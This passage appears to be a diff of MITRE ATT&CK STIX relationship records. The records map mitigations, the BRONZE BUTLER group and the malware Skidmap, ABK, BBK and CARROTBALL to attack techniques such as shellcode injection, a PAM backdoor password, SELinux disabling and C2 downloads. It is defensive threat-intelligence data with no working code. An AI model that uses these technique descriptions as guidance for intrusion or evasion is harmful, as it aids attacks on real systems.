+ "target_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for creating snapshots or backups in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--9ce9ab1f-b4fa-41e7-8302-11c30f918001",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-19T14:45:59.763Z",
+ "created": "2020-06-09T15:33:13.725Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "relationship_type": "mitigates",
+ "description": "Routinely check user permissions to ensure only the expected users have the capability to create snapshots and backups.",
+ "id": "relationship--6f8f4546-9e1c-42c9-b76f-863e51d6cb2a",
+ "type": "relationship",
+ "modified": "2020-06-19T14:45:59.783Z",
+ "created": "2020-06-09T15:33:13.737Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--0a8f5e7d-04d8-4ca8-a1d1-ea6a0ccc6140",
+ "type": "relationship",
+ "modified": "2020-06-09T15:33:13.766Z",
+ "created": "2020-06-09T15:33:13.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--a22e57a2-1d94-45eb-bc79-ec7106ae81c6",
+ "type": "relationship",
+ "modified": "2020-06-09T15:36:04.088Z",
+ "created": "2020-06-09T15:36:04.088Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used Right-to-Left Override to deceive victims into executing several strains of malware.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ff6fd36b-bc49-4df7-86f0-62b9d1fc9754",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.161Z",
+ "created": "2020-06-09T18:31:56.350Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--138fb337-c378-43a3-bacb-54f40696fb6b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.180Z",
+ "created": "2020-06-09T18:50:04.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has masked executables with document file icons including Word and Adobe PDF.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2f2432b0-d985-41d8-bc47-e4aa1dbf8372",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.182Z",
+ "created": "2020-06-09T18:50:04.600Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used tools to enumerate software installed on an infected host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--54e0e380-aef8-4c63-9792-ebda05affee6",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.166Z",
+ "created": "2020-06-09T20:34:21.093Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--0bb4fb8a-0b0f-46c6-820b-d46c5f98fa12",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.131Z",
+ "created": "2020-06-09T21:23:39.119Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has created a fake rm binary to replace the legitimate Linux binary.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--30c69dcc-9cf7-4352-a30c-0e7bc86b38e7",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.762Z",
+ "created": "2020-06-09T21:23:39.156Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check whether the infected system\u2019s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--709d0737-e2ac-4ce3-9772-0dbc06f9667e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.207Z",
+ "created": "2020-06-09T21:23:39.163Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--513128aa-573e-4185-b0dc-88738edacb65",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.202Z",
+ "created": "2020-06-09T21:23:39.165Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--759185fe-d576-43f5-afac-acd653e5fcf4",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.204Z",
+ "created": "2020-06-09T21:23:39.171Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--f474fc4e-8fd4-4c67-b55c-23c67807a94f",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.162Z",
+ "created": "2020-06-09T21:23:39.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--40f49d74-4d0f-467a-be79-cd57559d8230",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.211Z",
+ "created": "2020-06-09T21:23:39.176Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--61cfe134-e24e-490e-a298-40612df42832",
+ "type": "relationship",
+ "modified": "2020-06-26T04:03:50.768Z",
+ "created": "2020-06-09T21:23:39.177Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has used pm.sh to download and install its main payload.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--b3bcdaeb-e4d7-403d-902e-df55aa5b6bb9",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.198Z",
+ "created": "2020-06-09T21:23:39.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d8557c07-240a-4dbb-b372-1111a05a5303",
+ "type": "relationship",
+ "modified": "2020-06-10T14:44:23.140Z",
+ "created": "2020-06-10T14:44:23.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to identify the installed anti-virus product on the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--07173c7c-335d-488b-b3ff-2f94168500db",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.160Z",
+ "created": "2020-06-10T17:28:46.682Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--97fe312d-7a04-43f9-8076-69fe324517ce",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.164Z",
+ "created": "2020-06-10T17:28:46.706Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c8467e6-0878-4c62-afe6-55f124872089",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.167Z",
+ "created": "2020-06-10T17:28:46.709Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to download files from C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9ffa4f56-8fe5-4439-897d-df432bccb52d",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.185Z",
+ "created": "2020-06-10T17:28:46.725Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used steganography in multiple operations to conceal malicious payloads.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5777849-9cea-4e02-93ba-9065b27f0e58",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.187Z",
+ "created": "2020-06-10T17:43:03.538Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6e122559-0e6e-4514-aa60-652e99292077",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.163Z",
+ "created": "2020-06-10T17:43:03.820Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eda69379-85f5-4512-aadc-ed7f5d2883bf",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.184Z",
+ "created": "2020-06-10T17:50:30.129Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2dcfc7b7-ead5-4996-b70d-205d4f9d59f5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.381Z",
+ "created": "2020-06-10T18:15:11.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--576db5e8-7371-4dea-ada9-599cc231e727",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.391Z",
